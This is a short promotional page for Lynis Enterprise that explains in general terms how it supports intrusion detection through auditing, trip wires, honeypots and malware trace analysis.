Even when taking the right security measures, just a single weak spot is enough for intruders to break in. In such case a system might have been hacked, or taken over by an evildoer. Often companies don't realize this for weeks, or even months! This is why intrusion detection is an important area in your security plan.
Detection methods are not simply a replacement for prevention or damage control. It actually builds on top of those and measuring their effectiveness. If you get a warning, or an actual intrusion, it provides a valuable lesson regarding your other security controls.
Unfortunately most companies spend too much money in prevention measures, resulting in weakness detection methods. Lynis Enterprise fills in this gap, by auditing your existing defenses. In some cases Lynis can discover intrusions, by comparing expected results with the encountered values.
Digital intrusion can be detected via different methods. For example placing digital trip wires, which alert an administrator when such wire "tripped". Lynis helps you decided what and where to place these trip wires. From setting up an audit configuration, up to functionality like honeypots.
The system will be checked for suspected events and scripts, triggered via cron or other mechanisms. To track traces of malware, running processes will be analyzed, together with files stored on disk. We use both whitelists and blacklists, to find signs which might indicate a successful intrusion. This functionality is provided by a separate Lynis plugin and modular intelligence on the central node. By comparing systems and using the previous detection methods, we can find issues which would else remained hidden.